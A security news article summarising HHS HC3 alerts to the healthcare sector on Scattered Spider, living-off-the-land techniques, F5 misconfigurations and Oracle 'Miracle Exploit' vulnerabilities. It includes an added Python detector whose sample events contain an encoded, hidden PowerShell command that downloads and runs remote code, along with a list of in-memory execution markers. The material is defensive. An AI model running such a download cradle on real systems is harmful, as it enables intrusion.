HHS Alerts on Scattered Spider, Living off the Land, Miracle Exploit, F5 Attacks
Federal authorities in a flurry of recent alerts are warning the healthcare sector to be vigilant against a growing array of cyberthreats. Those include hacks by Scattered Spider cybercriminals, living-off-the-land attacks, and bad actors looking to exploit weaknesses such as F5 misconfigurations and the so-called “Miracle Exploit” vulnerabilities in some Oracle software.
The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center, in a series of recent alerts, urges healthcare organizations to stay aware and proactive in defending against those and related threats, which have already affected organizations in the healthcare and public health sector, as well as in other industries.
Scattered Spider
Scattered Spider is a financially motivated, native English-speaking threat actor group that has been active with ransomware attacks and other intrusions since at least 2022, targeting organizations in various industries, including healthcare, HHS HC3 said.
The group – also known as Octo Tempest, Roasted 0ktapus, Storm-0875, Starfraud, UNC3944, Scatter Swine and Muddled Libra – has become known for advanced social engineering techniques such as voice phishing that uses artificial intelligence tools to spoof victims’ voices in order to obtain initial access to targeted organizations, said HHS HC3. The group will likely continue to evolve its tactics, techniques and procedures to evade detection, the agency said.
“Scattered Spider has leveraged various malware and tools in its campaigns, including both publicly available and legitimate tools,” HHS HC3 said. “For example, the group has leveraged various remote monitoring and management tools, used multiple information stealers, and deployed ALPHV/BlackCat ransomware to victim environments for financial gain.”
Scattered Spider threat actors have historically evaded detection on target networks by using living off the land – or LOTL – techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.
Some experts agree with the HHS HC3 assessment about the level of threat the group poses to healthcare sector entities.
“Scattered Spider’s use of social engineering, especially AI-driven voice phishing, makes it a major threat because it can bypass typical defenses and prey on human vulnerabilities,” said Christiaan Beek, senior director of threat analytics at security firm Rapid7.
“Healthcare workers are often juggling many tasks and may not immediately recognize this level of social engineering, putting their organizations at risk. Plus, the group’s flexibility in using various ransomware strains adds to the potential for major disruptions and data theft,” he said.
“Security awareness training that specifically focuses on the social engineering component is important, but it’s also critical that health IT teams go further to ensure they have complete visibility into their external attack surface as well as the technology, people and processes in place to efficiently and effectively detect and respond to attacks,” he said.
Living-off-the-Land Attacks
Besides Scattered Spider, other threat actors also rely on LOTL techniques in their attacks, and healthcare is a prime target, as HHS HC3 warns in a separate alert. In LOTL attacks, hackers use legitimate software and functions already available on victims’ systems to perform malicious actions, making them more difficult to detect with legacy security tools.
“This type of attack takes advantage of scripting languages to execute malicious code directly in memory, bypassing traditional antivirus software that primarily scans files on disk, making it extremely challenging for security teams to detect and mitigate these attacks,” HHS HC3 warns.
LOTL attacks give hackers more time to escalate privileges, exfiltrate data and set up backdoors for future access. “LOTL attacks are particularly effective against healthcare systems that rely on a wide range of trusted tools and technologies,” HHS HC3 said.
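As an added example (not from the HHS HC3 alerts or this article), a small Python detector that applies the point above, and the Scattered Spider section’s note on LOTL evasion, to process-creation telemetry: because the payload never touches disk, the signal has to come from the command line and its decoded contents rather than from a file scan. The event format, the script-host and parent-process lists, and the sample lines are constructed assumptions.

```python
import base64
import re
# Assumed (hypothetical) event format: parent_image|image|command_line
EVENT = re.compile(r"^(?P<parent>[^|]+)\|(?P<image>[^|]+)\|(?P<cmd>.*)$")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe")
# Tokens that indicate code fetched or decoded and run in memory rather than from a file on disk
IN_MEMORY_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "net.webclient")
ENC_FLAG = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def decode_encoded_command(blob: str) -> str:
    # PowerShell -EncodedCommand is base64 over UTF-16LE text; return '' if it does not decode
    try:
        return base64.b64decode(blob).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_line(line: str) -> list[str]:
    # Return the LOTL indicators found in one event; an empty list means nothing suspicious
    m = EVENT.match(line.strip())
    if not m:
        return []
    parent = m["parent"].lower().rsplit("\\", 1)[-1]
    image = m["image"].lower().rsplit("\\", 1)[-1]
    if image not in SCRIPT_HOSTS:
        return []  # ordinary binaries are out of scope for this rule
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"script host spawned by {parent}")
    enc = ENC_FLAG.search(m["cmd"])
    if enc:
        reasons.append("encoded command line")
    # Inspect the decoded payload as well: the visible command line may carry only a base64 blob
    effective = (m["cmd"] + " " + (decode_encoded_command(enc.group(1)) if enc else "")).lower()
    hits = [k for k in IN_MEMORY_MARKERS if k in effective]
    if hits:
        reasons.append("in-memory execution markers: " + ", ".join(hits))
    if re.search(r"-w(?:indowstyle)?\s+hidden", effective):
        reasons.append("hidden window")
    return reasons

def _encode(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16le")).decode()
# Constructed sample events, not real telemetry: an editor, a scheduled backup script, an in-memory cradle
SAMPLE_LINES = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\nurse\notes.txt",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\backup.ps1",
    r"C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
]
```

The second sample shows why the rule keys on behaviour rather than on the binary name: a routine PowerShell script run from disk produces no indicators, while the Office-spawned, encoded, hidden-window invocation produces four.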
F5 Misconfiguration Exploits
Threat actors exploiting F5 misconfigurations are also a big concern for healthcare sector entities, HHS HC3 said.
“For years, F5 Networks, Inc., a multi-cloud application services and security company’s BIG-IP software and hardware, have been subject to exploitation of its vulnerabilities by various threat actors,” HHS HC3 said.
The F5 product suite includes a variety of services, such as load balancing, DNS and connectivity for network applications. “Its ability to handle high-bandwidth interactions makes it popular among large enterprises and governments, key targets of both nation-state and cybercrime groups,” HHS HC3 said.
“For this reason, any vulnerability is a significant security risk for F5’s BIG-IP users, as well as third parties whose personal and financial information may be stored on or processed by a vulnerable device.”
To reduce the risk of such exploitation, HHS HC3 notes that other federal authorities, including CISA, “strongly urge all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of catalog vulnerabilities as part of their vulnerability management practice.”
Miracle Exploit
HHS HC3 also warns that many healthcare organizations are at risk from attacks involving the “Miracle Exploit,” a set of critical vulnerabilities in Oracle products, primarily affecting Oracle Fusion Middleware and its ADF Faces framework, which is used to build web interfaces for Java EE applications.
The exploit, first disclosed in 2022, includes CVE-2022-21445 and CVE-2022-21497, both of which allow attackers to execute remote code without authentication, HHS HC3 said.
“This can lead to full system compromise, potentially exposing sensitive data and enabling lateral movement within a network. Healthcare organizations could be vulnerable to the Miracle Exploit, especially if they use Oracle Fusion Middleware products that rely on the ADF Faces framework,” HHS HC3 said.
Because healthcare organizations often depend on complex IT infrastructures and middleware for managing critical operations and sensitive patient data, they could be at significant risk if the vulnerabilities are not patched, the alert warned.
“Healthcare organizations rely heavily on enterprise software for managing electronic health records, patient billing and other critical services. If these systems are integrated with vulnerable Oracle middleware components, the consequences of exploitation could include data breaches, operational disruptions and regulatory penalties, particularly under HIPAA,” HHS HC3 said.
Heed the Warnings
Experts said that all the threats HHS HC3 spotlights can pose significant concerns for healthcare sector entities, depending in particular on the technology used within an organization’s infrastructure and how well the entity keeps it patched.
“Historically, F5 has been a complex system within itself to manage and often provides connectivity between network segments,” said Jeff Wichman, director of incident response at security firm Semperis.
“Living off the land will always be concerning since attackers are using legitimate installations for software to perform malicious activities. It is much more difficult for incident responders to detect threats when the attacker doesn’t need to deploy malware or C2 software for access,” he said.
But for healthcare organizations that use Oracle components, HHS HC3’s warning about the Miracle Exploit is the most concerning and urgent, he said. “EHR and patient billing is exactly what the hackers are going to go after, as compromises here will have the biggest impact on the organization and take the longest to recover from,” he said.
“The Miracle Exploit is one of the more complicated items to patch in a healthcare environment. Since EHR systems are the most important item within the infrastructure, they are more risk-sensitive to patching and updating.”
Of course, the healthcare sector – like most industries – is facing a very long and growing list of threats well beyond HHS HC3’s most recent alerts.
For instance, as telehealth services expand, more healthcare devices are internet-connected, making them attractive targets, Beek said. “Unfortunately, security architecture wasn’t traditionally integrated into the design process for many of these types of devices.”
Healthcare sector entities also must stay mindful of the risks posed by their vendors, service providers and other third parties, experts said.
“Threat actors are actively targeting service providers because they have network access to multiple organizations and often possess weaker cybersecurity controls,” said Matthew Chevraux, director of FTI Consulting’s cybersecurity practice, and a former U.S. Secret Service special agent and manager.
“Gaining unauthorized access through a connected entity can be easier to accomplish and provides entry to multiple healthcare organizations,” he said. “Threat actors usually look for the path of least resistance to achieve their objective, and that often comes in the form of a connected third party.”